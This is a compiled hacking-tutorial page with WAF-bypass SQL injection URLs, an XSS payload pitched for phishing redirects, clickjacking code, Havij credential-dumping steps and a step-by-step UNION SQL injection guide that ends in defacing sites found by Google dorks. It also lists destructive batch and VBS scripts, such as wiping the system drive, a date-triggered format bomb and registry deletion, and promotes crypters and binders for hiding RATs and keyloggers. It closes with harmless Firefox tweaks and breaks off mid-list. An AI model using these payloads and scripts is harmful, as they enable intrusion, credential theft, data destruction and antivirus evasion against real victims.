Hack Web Application Firewall

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall (WAF).

By Sqli:

http://abc.com/detail.php?id=44 union all select 1,2,3,4,5--

Bypassed Sqli:

http://abc.com/detailphp?id=1 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--

By Function Capitalization:

Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass by case changing.

Actual query:

http://abc.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF:

http://abc.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5--

By Replaced Keywords:

Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another like below script.

Actual query:

http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF:

http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--

XSS- Cross Site Scripting

The XSS is basically a way to redirect the user to another webpage without the user knowing about this.
There are two types of XSS :
* Reflective
* Stored

Reflective XSS:

This is the most common type of XSS.In this case the code is not stored on the server-side. Let me show you a demo of this. Let us assume there exists a web page with a search box in it.

http://www.search.com/

Now type anything in the box and look at the URL. If we type “hacking”. The URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

<input type=”text” id=”searchbox” value=”hacking”>

Now Suppose this website is vulnerable to XSS , if we make the URL as:
http://www.search.com/search?q=”><script>alert(“hacked&#8221
The html code of the box would become as follows:
<input type=”text” id=”searchbox” value=””><script>alert(“hacked”)</script>. Now what has happened is that, we have manually closed the input box and written our own script box. So if you give this link to someone then “hacked” would pop up on the screen.

This link is also very good   http://ha.ckers.org/xss.html , once you get the hang of XSS.

Now when you give this link to someone, they will actually goto http://www.yoursite.com thus fooling the user :poc.
The following is a POC- Proof Of Concept.
http://www.google.com/search?btnI&q=allinurl:http://www.yahoo.com/

In this case it is going to goto http://www.yahoo.com even though the URL starts from http://www.google.com. You can also encode the URL so that the user doesn’t see the last part of the URL. You can learn how to do that here : http://pc-help.org/obscure.htm

You can goto http://www.xssed.com and check out the XSS vulnerabilities in all the websites and use it to your advantage.

Eg. you can make one phishing site of GMAIL and you can give the victim a link with http://www.google.com/(link which is vulnerable to XSS) which will re direct the user to your phishing site. The User wont know as he will mostly see the starting part of the URL, thus he is fooled. You can’t use the above link ( given for POC) for your phishing page.:p Guess Why!

Try using some other XSS vulnerability from xssed.com or try finding your own XSS vulnerability on some website.

STORED XSS:

In this type of XSS, the Malicious Code is stored on the server. Eg . Take the case of a guest book which takes user input , stores it in database and displays it to other users. If the code is “Buggy” , a hacker can insert a javascript there so that every time any user opens that page, the script is executed, without the user knowing.

Reflective XSS is more common on the internet as the developers are more careful when something is being written to the server database :p

Interesting Information:

XSS is a very dangerous vulnerability. Bank Websites take utmost care to see that their code is not vulnerable to XSS as they are the most targeted. Just Imagine if a bank URL re directs to some hacker’s phishing page. All the user’s details are lost!

The best video tutorial of XSS is here:  http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out from the user input, so the thrill is in finding a way to evade this filter!.

This link is also very good   http://ha.ckers.org/xss.html  , once you get the hang of XSS.

Clickjacking

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable. when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack.

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download:
ClickJacking Tool

For Defence:
Clickjacking Protection

For more information:
OWASP

Hack Sites Using Havji

Just Follow these easy steps :

1. First download havij from here
http://itsecteam.com/

2. Run Havij SQL Injection software and copy and paste vulnerable website link

3. Now click in the “Analyze” Button

4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulernable and type of injection and if db server is mysql and it will find database name.Then after get it’s database is name like xxxx_xxxx

5. Then Move to another operation to find tables by clicking “tables” as figure shown. Now click “Get tables” Then wait some time if needed

6. After founded the tables ,you can see there will be “users” Put mark on it and click in the ” get columns ” tab

7. In that Just put mark username and password and click “Get data”

8. Finally you got now username and password of the admin…

V.I.R.U.S Scripts

IMPORTANT NOTE: These coding only for knowledge concept .All Scripts Here Are To Be Copied In Note Pad

This Virus Deletes All The Content Of A Drive...

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file

Disable Internet Permanently Save As A bat File

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

The Most Simple Virus To Crush The Window

@Echo off Del C:\ *.* |y Save It As Any.bat

This Will Crash Ur Computer

Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Save It As Anything.vbs It Only Works With Windows XP

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes* Code:- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

Bomb Virus

Copy Paste The Following If %date% NEQ 2014/11/20 goto exit format E: /y >nul :exit exit And Save It As Anything.bat Note:- You Can Change The Date ( 2014/11/20 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day

Crazy caps lock

*This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Endless Enter

*This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop

Endless Backspace

*This makes it so the backspace key is constantly being pressed* Code:- MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco. The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!
1.This piece of code makes your keyboard a live disco..
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop
2.This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 200 wshshell.sendkeys “{CAPSLOCK}” wscript.sleep 100 wshshell.sendkeys “{NUMLOCK}” wscript.sleep 50 wshshell.sendkeys “{SCROLLLOCK}” loop
Instructions: *paste any of the two above codes in notepad *Save as “AnyFileName”.vbs *Run the file *To stop, launch task manager and then under “Processes” end “wscript.exe”

V.I.R.U.S

Vital Information Resource Under Siege

Introduction:

A VIRUS is a small, executable program with the ability to replicate itself, usually Without the permission or knowledge of the user. The word "virus" is the generic term for worm, viruses and Trojans. Computer viruses are called ‘viruses’ because they share some common characteristics of biological viruses. Computer viruses like the biological viruses are task specific. They are designed to infect a designated target. This can be a specific type of file or computer sub-system. It must piggy back on top of some other program to get executed. It passes from computer to computer like biological viruses pass from person to person. Fighting computer virus is like human intelligence fighting against itself. Virus-masters continuously upgrade their techniques to ensure their survival in the computing Environment. Computer virologists face the task of combating new viruses that have been developed by members of their own programming fraternity. Once they have found an anti-virus software to take care of an existing virus, virus-meisters invent a new string of viruses, which are even more difficult to decipher or crack.

Read more.....

Appearance of computer viruses is one of the most interesting developments in Technology in the twentieth century. Computer viruses are mysterious but fascinating at the same time. Every time a new virus hits, it makes the news. On the other hand they Show how sophisticated they have become in terms of technology, and it is precisely our dependence on technology that makes us so vulnerable. Coming back to viruses... virus can add its code anywhere in the host program and/or the system area of a hard disk or floppy disk. The host program is nothing but an executable file like .EXE, .COM, etc. Anywhere in the file means that the virus code can get appended in the beginning, end, in the middle or by simply placing a pointer to a different location on disk where the virus can find it. It is coded in such a way that the virus code gets executed first. Also, the code it appends to a file is normally not the complete source code of the virus. It is just the self-replicating part so that it can attack more number of programs. Difference between a computer virus and other programs Viruses are designed to self-replicate, usually without the knowledge of the user. They often contain “payloads”, action that the virus carries out separately from replication.

Viruses can be hidden in: 􀂙 Programs available on floppy disks or CDs.
􀂙 E-mail attachments
􀂙 Material downloaded from the web
Payload of computer viruses Payload is the malicious activity, in which the virus carrying it performs. In short, we can define payload as the extent of damage a virus is supposed to cause. A payload can be triggered by a number of conditions like:
􀂙 Certain date of month or year, execution. 􀂙 Execution of certain programs 􀂙 A built-in counter Example of what payload can do:
⇒ Delete files
⇒ Confidential information access and release
⇒ Ε-Mail – unauthorized mass e-mailing
⇒ File modification
⇒ Over writing security settings.
⇒ System instability
⇒ Degrading system performance – steals system cycles.

Virus Behavior:

In general, a virus has two phases, “infection phase” and “attack phase”. The first phase is the infection phase, where the virus reproduces widely and the second is the attack phase, where they do whatever damage they are programmed to do. Its presence can be felt only when they activate themselves.

Read more.....

Infection phase Virus writers have to balance how and when their virus should infect against the possibility of being detected. Therefore the spread of infection may not be immediate. This is the phase where the virus commences the acquisition of the system by first infecting the identified target, second taking charge of the target and lastly by installing its own command. These steps are coded in detail in the instruction code given to it by the author. No one knows when exactly a virus will infect other programs or in simple words when it will activate itself. Some programs get executed each time they are executed, and some viruses will infect upon a Trigger. You can never be sure that your system is not infected by a virus after running an AV program a few times. This is because the virus would not have started its infection phase. The virus writer will want his program to spread as far as possible so that in the second phase, "The attack phase", the victim’s computer will have a positive impact to the virus. Many viruses go resident on the memory. This provides an upper hand for the virus, as it can wait for an external event before it starts the infection and also the trigger used by the virus becomes hard to guess. The resident virus frequently takes over portion of the system software to hide their presence. This technique is called stealth. Attack phase Not all viruses attack, but all use system resources and often have bugs. Most of the viruses do unpleasant things like deleting files or changing random data on your disk, slowing down your PC, stealing passwords from the system and mailing it to a remote email, etc. Viruses often delay revealing their presence by launching their attack only after they have had ample opportunity to spread. This means that the attack phase can start even after months of infection. This attack phase is optional. Many viruses simply reproduce themselves and have no trigger for an attack phase. Classification of Computer viruses

Viruses can be classified in a number of ways. One way of classifying them is as follows:
􀃡 Environment
􀃂 File Viruses
♦ Overwriting virus
♦ Parasitic virus or Cavity (space-filler) virus
♦ Companion virus
♦ File worms
♦ Link viruses or cluster viruses
♦ Source code viruses (OBJ, LIB viruses)
♦ Tunneling viruses
♦ Camouflage virus
􀃂 Boot viruses
♦ Parity boot
♦ Boot-and-file virus
♦ System sector virus
􀃂 Macro Viruses
􀃂 Network Viruses
􀃂 VB worms
􀃡 Operating system (OS)
􀃡 Different algorithms of work
􀃂 Terminate and stay resident (TSR) virus
􀃂 Stealth Algorithm
􀃂 Armored virus
􀃂 Polymorphic or self-encrypting capabilities
􀃂 Logic bombs

work on windows xp

SQL Strings

Strings List:

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

SQL Injection

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.
In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

Step 1: Looking for the Vulnerability
www.something.com/news/news.php?id=130
The above code can be vulnerable to SQL injection. The above code is taking the ID as 130 and returning some values. . To see if the URL is vulnerable , put a ‘ at the end of the URL. So try this URL
www.something.com/news/news.php?id=130’
Now If you get an error something like it’s not a valid MYSQL statement or something like that, then it is possible to exploit this URL.  Example : When I did it on a website vulnerable to this exploit, I got the following
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
One more thing, if the URL also ends in .php?catid=x , where x is a number, even then you can use this above method to see if the site is vulnerable.
So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy ! You use a google dork to do this. So you are going to use google to find websites vulnerable. So type the following in google:
1.  inurl:.php?id=
2. inurl:.php?catid=
So now you will get a list of websites. Test them one by one in the above method mentioned, to see if its vulnerable.

Step 2: Exploiting the vulnerability
This tutorial is only for educational purposes. Kindly do not misuse it.
You have a vulnerable URL
www.something.com/news/news.php?id=130
Ok , Now how do you deface it   ??
Finding number of columns
Now put the following in the url
http://www.something.com/news/news.php?id=130 order by 10–
Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.
Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .
Find Vulnerable columns
Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.
This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.
Finding tables
Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() –
Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .
Finding Column names
Similarly get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step
Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–
Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.
Now I got output something like
admin:”encrypted hash”,user2:”encrypted hash”, and so on…
So usernames are  not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google dorks :
Defacing
Now you have the admin username and admin password from the previous step.Now you have to find the admin page of the site.
Goto http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.
It will give you the admin page after sometime.
Mine turned out to be  http://www.something.com/admin
So here you get a login box. Put in the username and password of the admin and that’s it.
Now do whatever you want, like defacing or deleting tables etc…
There is a reason i have not told you what the something.com is. You can use the google dorks i mentioned to find any vulnerable site.

Hacking Tools

Tools

BEWARE OF TOOLS BY THESE TOOLS YOUR DEVICE CAN BE DEMAGE.

PROXY FINDER

Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

Download here

Read more.....

ANONYMOUS SURFING : HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use.

Download here

ANONYMOUS SURFING : PC MESH ANONYMOUS WEB SURFING

PC Mesh Anonymous Web Surfing is an internet utility to hide your IP address while you are browsing the web. IP address is your internet identification number which is detectable by any web site that you visit. It is fully automatic. You don't need to have any knowledge of setting up proxy connections. Just click "Autopilot" and watch. PC Mesh Anonymous Web Surfing will check your real IP address, verify a large number of proxy servers with a lightning fast speed, delete the non-functional proxies, sort them by ping, select the fastest proxy, check your IP address again and compare it with your real IP address.

Download here

ANONYMOUS SURFING : IP ANONYMIZER

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.

Download here

ANONYMOUS SURFING : GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features: * Encrypts your Internet connection * Erases all traces of your Web surfing * Removes aggressive spyware * Prevents identity theft and credit card fraud * Secures confidential files * Eliminates online ads * Also includes Spycatcher which is an excellent anti-spyware.

Download here

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD KRYPTONITE CRYPTER

This is another FUD crypter used to crypt the source code of your keylogger, RAT or botnet etc so that they are not detected by antiviruses. The advantage of using it is that it is almost FUD, only Avira and Sophos Antivirus detected it on NoVirusThanks.

Read more.....

Download here

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD t3c4i3 CRYPTER

This Crypter is an easy to use and a fully undetectable (FUD) crypter software used to hide our viruses, RATs or any keylogger from anti-viruses so that they are not detected and deleted by antiviruses. It allows users to crypt the source code of their program and assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus easily bypasses antivirus detection.

Download here

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : SIMPLE BINDER

Simple Binder is a software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run. Password: hackingguide

Download here

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : WEEKEND BINDER

Weekend Binder is another software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run.Password: hackingguide

Download here

DARK PORT SCANNER

Dark Port Scanner is a simple port scanner with an easy to use interface which scans for open ports on computers in a network.

Download here

Read more.....

ANGRY IP SCANNER

Angry IP scanner is a very fast IP address and port scanner.It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Angry IP scanner simply pings each IP address to check if it's alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files.

Download here

PACKET SNIFFER : TCP DUMP

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download here

Read more.....

NETWORK SCANNING TOOL : NMAP

Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.

Download here

PACKET SNIFFER : WIRESHARK

Wireshark is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download here

WIRELESS SNIFFER : KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

Download here

Read more.....

WEP/WPA CRACKING TOOL : AIRCRACK

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Download here

VULNERABILITY ASSESSMENT TOOL : NESSUS

Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Download here

Read more.....

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.

Download here

VULNERABILITY ASSESSMENT TOOL : RETINA

Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.

Download here

VULNERABILITY SCANNER : X-SCAN

A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more.

Download here

WEBSITE HACKING SOFTWARE : ADMIN FINDER

Admin Finder is a tool which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present you the page on which we can login with the administrator password.Password: hackingguide

Download here

WEBSITE HACKING SOFTWARE : EXPLOIT SCANNER

Exploit Scanner is a tool which scans the website to check if it is vulnerable to attack or not. You just have to enter the URL and it will instantly produce the results as if the website is vulnerable to attack or not.Password: hackingguide

Download here

WEBSITE HACKING SOFTWARE : SQLI HELPER

SQLI Helper is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website. There is also no need of knowledge of SQL to use this software. This tool will do it all by itself. You only have to tell her what do and where to look.Password: hackingguide

Download here

Firefox About:Config Tricks

You may have installed countless add-on in Firefox to enhance your using experience, but if you want to get the most out of Firefox, you really have to hack your way into the about:config.

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance. Here are 28 of the popular tweaks.

Accessing your about:config page

In your Firefox, type about:config in the address bar.

about-config

You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed.

firefox-config-warning

On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field. The list will narrow to only the entries that match your keyword as you type. To modify the value, simply double click on the entry value field and update the entry. That’s all! Isn’t that simple? Now, let’s get to the tweaking.

1) Adjust the Smart Location Bar’s Number of Suggestions

In Firefox 3, when you start typing in the location bar, a drop-down list of suggestion URLs will be shown. If you want it to show more than 12 suggestions (12 is the default), you can adjust thebrowser.urlbar.maxRichResults keys and get it to show the number you want. firefox-smart-location Config name: browser.urlbar.maxRichResults Default: 12 Modified value: Set to your desired number of suggestion. If you want to disable it all together, set it to -1

2) Disable the session restore function

Firefox 3 automatically saves your session every 10 secs so that whenever it crashes, it can restore all your tabs. While this is a useful feature, some of you might find it irritating. To disable this function, toggle the value of browser.sessionstore.enabled to False Config name: browser.sessionstore.enabled Default: True Modified value: False if you want to disable the session restore function

3) Adjust the Session Restore Saving Frequency

Same as above, if you decided to keep the session restore feature on, but want to reduce the session saving frequency, change the value of browser.sessionstore.interval so that Firefox will save the session at a longer interval. Config name: browser.sessionstore.interval Default: 10000 (in msecs, equivalent to 10secs) Modified value: Set it to your desired value. 1000 means 1 sec and 60000 means 1 minute.

4) Enable Advanced Color Profile Support

Firefox has this advanced color profile features that display higher image quality. It is not enabled by default as it has a negative effect on the performance of the browser. If you are concern with the image quality rather than the performance, you can activated it via thegfx.color_management.enabled setting Config name: gfx.color_management.enabled Default: False Modified value: True (if you want to activate the color profile support feature)

5) Disable Antivirus Scanning

This is mainly for Windows users. By default, Firefox 3 automatically scan the downloaded file with the default anti-virus application to make sure it is free of virus. If you download a big file, it could take a long time for the whole scanning process to complete. To increase the performance of the browser, you might want to consider disabling the anti-virus scanning via thebrowser.download.manager.scanWhenDone key. Config name: browser.download.manager.scanWhenDone Default: True Modified value: False (if you want to disable it)

6) Configuring The Scrolling Tabs

When you opened many tabs, Firefox will not keep on reducing the tab width. Instead, it shows a scrolling bar so that the min width (100px) is conserved and you can scroll to find your tabs. If you are those who don’t like the scrolling tab function and prefer Firefox to show all the tabs, regardless how small it is, you can set the value of browser.tabs.tabMinWidth to 0 to disable it. Similarly, if you want Firefox to display more tabs before showing the scrolling button, you can reduce the default value to a lower value, say 75 pixels. Firefox-scrollingtab Config name: browser.tabs.tabMinWidth Default: 100 Modified value: 0 if you want to disable the scrolling functions, other values to set the min width value

7) Show/Disable Close button on Tabs

Some people love to see the Close (the red X) button on every tabs, but some hate it. Whatever is it, you can configure it to your preferences via the browser.tabs.closeButtons setting. firefox-tab-close Config name: browser.tabs.closeButtons Default: 1 Modified values: 0 – display a close button on the active tab only 1- display close buttons on all tabs 2- don’t display any close buttons 3- display a single close button at the end of the tab strip

8) Extend Scripts Execution Time

In Firefox 3, a script is only given 10 seconds to respond, after which it will issue a unresponsive script warning. If you are hooked on a slow network connection, you might want to increase the script execution time via dom.max_script_run_time to cut down on the frequency of the no script warning. Config name: dom.max_script_run_time Default:10 (in secs) Modified value: 20, or any values greater than 10

9) Handling JavaScript Popups

When you come across a site that executes a javascript open new window function, and if the popup window is without all the usual window features, i.e. back/forward/reload buttons, status bar etc, Firefox will automatically treat it as a popup and will not open it as a new tab. However, if you find this to be a nuisance and wanted to open all new windows in a new tabs, you can specify it via the browser.link.open_newwindow.restriction setting. Config name: browser.link.open_newwindow.restriction Default: 2 – Open all JavaScript windows the same way as you have Firefox handle new windows unless the JavaScript call specifies how to display the window Modified values: 0 – open all links as how you have Firefox handle new windows 1 – do not open any new windows 2- open all links as how you have Firefox handle new windows unless the Javascript specify how to display the window

10) Enable Spell Checking In All Text Fields

The default spell checking function only checks for multi-line text boxes. You can get it to spell-check for single line text box as well. Config name: layout.spellcheckDefault Default: 1 (spell checker for multi-lines text boxes only) Modified values: 0 – disable the spell checker 2 – enable the spell checker for all text boxes

11) Open Search Box Results In New Tab

When you search using the search box at the top right hand corner of the browser, it will display the search results in the current tab. If you don’t want the search to interfere with your current tab, you can tweak the browser.search.openintab to make it open in a new tab. Config Name: browser.search.openintab Default: False Modified value: True (open search box results in new tab)

12) Lower The Physical Memory Used When Minimized

This tweak is mainly for Windows users. When you minimize Firefox, it will send Firefox to your virtual memory and free up your physical memory for other programs to use. Firefox will reduce its physical memory usage, when minimized, to approximately 10MB (give or take some) and when you maximize Firefox it will take back the memory that it needs. The preference name does not exist and needs to be created. Right click on the background and select New->Boolean. Enter the name when prompted: config.trim_on_minimize Enter the values: True

13) Speed up your Firefox

Several tweaks required for this Config name: network.http.pipelining Default: False Modified value: True Config name: network.http.proxy.pipelining Default: False Modified value: True Config name: network.http.pipelining.maxrequests Default: 4 Modified value: any value higher than 4, but not more than 8 Config name: network.http.max-connections Default: 30 Modified value: 96 Config name: network.http.max-connections-per-server Default: 15 Modified value: 32

14) Increase/Decrease the Amount of Disk Cache

